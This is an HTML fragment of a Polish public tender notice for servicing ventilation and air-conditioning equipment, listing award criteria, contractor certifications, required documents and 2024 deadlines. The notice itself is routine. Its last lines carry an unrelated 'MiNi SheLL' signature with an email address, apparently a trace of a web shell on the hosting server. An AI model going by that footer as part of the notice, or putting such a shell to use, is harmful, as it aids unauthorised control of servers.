class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">16.	Zamawiający na podstawie art.214 ust.1 pkt 7 ustawy Pzp przewiduje udzielenie <br/>w okresie 3 lat od dnia udzielenia zamówienia podstawowego, dotychczasowemu Wykonawcy usługi zamówienia polegającego na powtórzeniu podobnych prac, zgodnie <br/>z przedmiotem niniejszego postępowania, w wysokości do 80% wartości zamówienia podstawowego. Zamówienie może dotyczyć całego zakresu zamówienia podstawowego i może być realizowane w obiektach zarządzanych przez Zamawiającego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">OPIS KRYTERIÓW OCENY OFERT, WRAZ Z PODANIEM ICH WAG I SPOSOBEM OCENY OFERT<br/>został określony w rozdziale XI SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie terminu realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1)	nie podlegają wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp, z zastrzeżeniem art. 110 ust. 2 ustawy Pzp oraz art. 7 ust. 1 ustawy z dnia<br/>13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, zwanej w dalszej treści ustawą z dnia 13 kwietnia 2022 r.,<br/>2)	spełniają warunki udziału w postępowaniu dotyczące uprawnień do prowadzenia określonej działalności gospodarczej, spełniają warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej. <br/>5.	Odnośnie pkt 1 ppkt 2 (warunek udziału w postępowaniu dotyczący uprawień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów) Wykonawca musi wykazać: <br/>że posiada Certyfikat dla Przedsiębiorcy prowadzącego działalność i wykonującego czynności polegające na instalacji, konserwacji lub serwisowaniu, naprawie lub likwidacji stacjonarnych urządzeń chłodniczych, klimatyzacyjnych i pomp ciepła wydany przez Urząd Dozoru Technicznego: zgodnie z art. 29 Ustawy z dnia 15 maja 2015 r. o substancjach zubożających warstwę ozonową oraz o niektórych fluorowanych gazach cieplarnianych. <br/>Warunek Dla zadnia nr 1, dla zadnia nr 2. <br/>Na gruncie art. 118 ust. 1 ustawy Pzp za niedopuszczalne należy uznać poleganie przez Wykonawcę, w celu potwierdzenia spełniania warunku udziału w postępowaniu, na zdolnościach podmiotu trzeciego w zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej.<br/>6.	Odnośnie pkt 1 ppkt 2 (warunek udziału w postępowaniu dotyczący zdolności technicznej lub zawodowej) Wykonawca musi wykazać, że dysponuje co najmniej jedną osobę posiadającą:<br/>1)	uprawnienia do dozoru urządzeń, instalacji i sieci elektroenergetycznych wytwarzających, przetwarzających, przesyłających i zużywających energię elektryczna (Grupa 1 pkt. 2,13): 2) urządzenia, instalacje i sieci elektroenergetyczne o napięciu do nie wyższym niż 1 kV; 13) aparatura kontrolno-pomiarowa oraz urządzenia i instalacje automatycznej regulacji, sterowania i zabezpieczeń urządzeń i instalacji wymienionych w pkt 1-12; w zakresie obsługi, konserwacji, remontu, montażu, kontrolno-pomiarowym<br/> Warunek Dla zadnia nr 1, dla zadnia nr 2 <br/>2)	uprawnienia do dozoru urządzeń wytwarzających, przetwarzających, przesyłających i zużywających ciepło oraz innych urządzeń energetycznych (Grupa 2 pkt 4,12,21) 4) sieci i instalacje cieplne wraz z urządzeniami pomocniczymi, o przesyle ciepła wyższym niż 50kW i o przesyle ciepła nie wyższym niż 500kW 12) urządzenia wentylacji, klimatyzacji i chłodnicze o mocy wyższej niż 50kW i o mocy nie wyższej niż 500kW, 21) aparatura kontrolno- pomiarowa i urządzenia automatycznej regulacji do urządzeń i instalacji wymienionych w pkt 1-20; w zakresie obsługi, konserwacji, remontu, montażu, kontrolno-pomiarowym <br/> Warunek Dla zadnia nr 1, dla zadnia nr 2 <br/>3)	uprawnienia do eksplantacji urządzeń, instalacji i sieci elektroenergetycznych wytwarzających, przetwarzających, przesyłających i zużywających energię elektryczna (Grupa 1 pkt. 2,13): 2) urządzenia, instalacje i sieci elektroenergetyczne o napięciu do nie wyższym niż 1 kV; 13) aparatura kontrolno-pomiarowa oraz urządzenia i instalacje automatycznej regulacji, sterowania i zabezpieczeń urządzeń i instalacji wymienionych w pkt 1-13; w zakresie obsługi, konserwacji, remontu, montażu, kontrolno-pomiarowym<br/>Warunek Dla zadnia nr 1, dla zadnia nr 2 <br/>4)	uprawnienia do eksploatacji urządzeń wytwarzających, przetwarzających, przesyłających i zużywających ciepło oraz innych urządzeń energetycznych (Grupa 2 pkt 4,12,21) 4) sieci i instalacje cieplne wraz z urządzeniami pomocniczymi, o przesyle ciepła wyższym niż 50kW i o przesyle ciepła nie wyższym niż 500kW 12) urządzenia wentylacji, klimatyzacji i chłodnicze o mocy wyższej niż 50kW i o mocy nie wyższej niż 500kW, 21) aparatura kontrolno- pomiarowa i urządzenia automatycznej regulacji do urządzeń i instalacji wymienionych w pkt 1-20; w zakresie obsługi, konserwacji, remontu, montażu, kontrolno-pomiarowym<br/> Warunek Dla zadnia nr 1, dla zadnia nr 2 <br/>5)	Certyfikat dla Personelu zgodnie z art. 20 ust. 1 ustawy z dnia 15 maja 2015 r. o substancjach zubożających warstwę ozonową oraz o niektórych fluorowanych gazach cieplarnianych.<br/> Warunek Dla zadnia nr 1, dla zadnia nr 2 <br/>Zamawiający dopuszcza możliwości łączenia dla 1 osoby stanowiska eksploatacji ze stanowiskiem dozoru. <br/>6)	W celu potwierdzenia, że Wykonawca posiada zdolność techniczną, Zamawiający wymaga aktualnych Certyfikatów lub innego dokumentu poświadczającego, że Wykonawca posiada autoryzacje/jest przeszkolony na wykonywanie przeglądów urządzeń klimatyzacyjnych objętych przedmiotem zamówienia tj.: GREE, MIDEA, INNOVA.<br/>W celu potwierdzenia w/w zdolności technicznej Zamawiający nie dopuszcza oświadczenia własnego Wykonawcy. <br/> Warunek Dla zadnia nr 1. <br/>7.	Odnośnie pkt 1 ppkt 2 (warunek udziału w postępowaniu dotyczący zdolności technicznej) Wykonawca musi wykazać, że w okresie ostatnich 3 lat przed terminem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy –w tym okresie, wykonał lub wykonywał co najmniej jedną usługę polegającą na serwisowaniu (przeglądy i naprawy) układów wentylacji mechanicznej w co najmniej 5 obiektach trwającej przez okres co najmniej 6 miesięcy w ramach jednej umowy o wartości nie mniejszej niż 50 000,00 zł brutto. <br/> Warunek Dla zadnia nr 1 <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	W celu potwierdzenia przez Wykonawcę, że nie podlega on wykluczeniu oraz spełnia warunki udziału w postępowaniu należy złożyć aktualne na dzień składania ofert oświadczenie (wzór, załącznik nr 2 do SWZ), że:<br/>1)	nie podlega wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r.,<br/>2)	spełnia warunki udziału w postępowaniu w zakresie wskazanym przez Zamawiającego.<br/>2.	Oświadczenie, o którym mowa w pkt 1, tymczasowo zastępuje wymagane przez Zamawiającego podmiotowe środki dowodowe.<br/>3.	Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>1)	zezwolenia, licencji, koncesji lub wpisu do rejestru działalności regulowanej<br/>Zgodnie z §12 ust. 1 rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy - Wykonawca wpisany do urzędowego wykazu zatwierdzonych wykonawców lub wykonawca certyfikowany przez jednostki certyfikujące spełniające wymogi europejskich norm certyfikacji może, zamiast odpowiednich podmiotowych środków dowodowych, o których mowa w ustawie i rozporządzeniu, złożyć zaświadczenie; <br/>2)	wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (wzór, załącznik nr 5 do SWZ/5a do SWZ).<br/>3)	wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi zostały wykonywane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyny niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie powinny być wystawione w okresie ostatnich 3 miesięcy – (wzór, załącznik nr 5b do SWZ – zadanie nr 1) <br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie z innymi Wykonawcami, wykaz dotyczy usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>4)	Certyfikat lub inny dokument poświadczający, że Wykonawca posiada autoryzacje/jest przeszkolony na wykonywanie przeglądów urządzeń klimatyzacyjnych objętych przedmiotem zamówienia t.j.: GREE, MIDEA, INNOVA <br/>W celu potwierdzenia w/w zdolności technicznej Zamawiający nie dopuszcza oświadczenia własnego Wykonawcy.<br/> Warunek Dla zadnia nr 1.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Wtedy: ustanawiają pełnomocnika do reprezentowania ich<br/>w postępowaniu o udzielenie zamówienia albo reprezentowania ich w postępowaniu i zawarciu umowy w sprawie<br/>zamówienia publicznego.<br/>6) Pełnomocnictwo wskazujące, iż osoba występująca w imieniu Wykonawcy lub Wykonawca występujący w imieniu<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia, jest do tego upoważniona, jeżeli nie wynika to z<br/>dokumentów potwierdzających zasady reprezentacji np. w przypadku spółki cywilnej - umowę spółki,<br/>Oświadczenie, o którym mowa w art. 117 ust. 4 ustawy Pzp, w przypadku Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia składane w przypadku wskazanym w Rozdziale III pkt 12 (wzór, załącznik nr 4 do SWZ).<br/>Oferta oraz oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp (dotyczące Wykonawcy / podmiotu<br/>udostępniającego zasoby/ każdego z Wykonawców ubiegających się wspólnie o udzielenie zamówienia), sporządza się, pod<br/>rygorem nieważności, w formie elektronicznej (dokumenty opatrzone kwalifikowanym podpisem elektronicznym) lub postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>5.	Podmiotowe środki dowodowe, w tym oświadczenie o którym mowa w art. 117 ust. 4 ustawy Pzp, zobowiązanie podmiotu udostępniającego zasoby, pełnomocnictwo sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy, z uwzględnieniem rodzaju przekazywanych danych. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Ze względu na ograniczoną ilość znaków nie ma możliwości wpisania wszystkich przewidzianych w umowie zmian.<br/>Szczegółowe zapisy dotyczące rodzaju i zakresu zmian do umowy oraz warunków ich wprowadzenia zawiera wzór umowy<br/>stanowiący załącznik nr 6 do SWZ - dla zadania nr 1 oraz stanowiący załącznik nr 6a do SWZ - dla zadania nr 2 <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-03-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://asystent.postepowania.pl/org/wroclawski-zespol-zlobkow/postępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-03-28 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-04-26</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Wykonawcy przygotują i przedstawią swoje oferty zgodnie z wymaganiami SWZ.<br/>2.	Do złożenia oferty konieczne jest posiadanie przez osobę upoważnioną do reprezentowania Wykonawcy:<br/>1)	ważnego kwalifikowanego podpisu elektronicznego, wystawionego przez dostawcę kwalifikowanej usługi zaufania, będącego podmiotem świadczącym usługi certyfikacyjne spełniające wymogi bezpieczeństwa określone w ustawie z dnia 5 września 2016 r. o usługach zaufania oraz identyfikacji elektronicznej <br/> Szczegółowe informacje o sposobie pozyskiwania usługi kwalifikowanego podpisu elektronicznego oraz warunkach jego użycia można znaleźć na stronach internetowych kwalifikowanych dostawców usług zaufania, których lista znajduje się pod adresem internetowym: http://www.nccert.pl/kontakt.htm<br/>lub<br/>2)	podpisu zaufanego, zgodnie z art. 3 pkt 14a ustawy z 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne<br/> Szczegółowe informacje o sposobie pozyskania usługi profilu zaufanego można odnaleźć pod adresem internetowym:<br/>https://www.gov.pl/web/gov/zaloz-profil-zaufany<br/>lub<br/>3)	podpisu osobistego, zgodnie z art. 2 ust. 1 pkt 9 ustawy z 6 sierpnia 2010 r. o dowodach osobistych<br/>Szczegółowe informacje o sposobie pozyskania podpisu osobistego można znaleźć pod adresem internetowym: https://www.gov.pl/web/e-dowod/podpis-osobisty<br/>3.	Wykonawca w postępowaniu może złożyć tylko jedną ofertę, która musi zawierać m. in.:<br/>1)	Formularz oferty sporządzony na podstawie wzoru stanowiącego załącznik nr 1 do SWZ,<br/>2)	Formularz Cenowy sporządzony na podstawie wzoru stanowiącego załącznik nr 1a do SWZ (zadanie nr 1); <br/>3)	Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu wymagane na podstawie art. 125 ust. 1 ustawy Pzp, aktualne na dzień składania ofert (wzór, załącznik nr 2 do SWZ),<br/>4)	Oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby (wzór, załącznik nr 2a do SWZ),<br/>5)	Zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia, o ile Wykonawca polega na zasobach innych podmiotów w celu spełniania warunków udziału w postępowaniu (wzór, załącznik nr 3 do SWZ), lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów,<br/>6)	Pełnomocnictwo wskazujące, iż osoba występująca w imieniu Wykonawcy lub Wykonawca występujący w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia, jest do tego upoważniona, jeżeli nie wynika to z dokumentów potwierdzających zasady reprezentacji np. w przypadku spółki cywilnej - umowę spółki,<br/>7)	Oświadczenie, o którym mowa w art. 117 ust. 4 ustawy Pzp, w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia składane w przypadku wskazanym w Rozdziale III pkt 13 (wzór, załącznik nr 4 do SWZ).<br/><br/>10.	Stosownie do dyspozycji art. 95 ust. 1 ustawy Pzp Zamawiający wymaga, aby Wykonawca lub podwykonawca przy realizacji przedmiotu zamówienia, zatrudniał na podstawie stosunku pracy w rozumieniu przepisów ustawy z dnia 26 czerwca 1974 r. Kodeks pracy, pracowników wykonujących prace naprawcze oraz serwisowe w centralach wentylacyjnych.

Creat By MiNi SheLL
Email: jattceo@gmail.com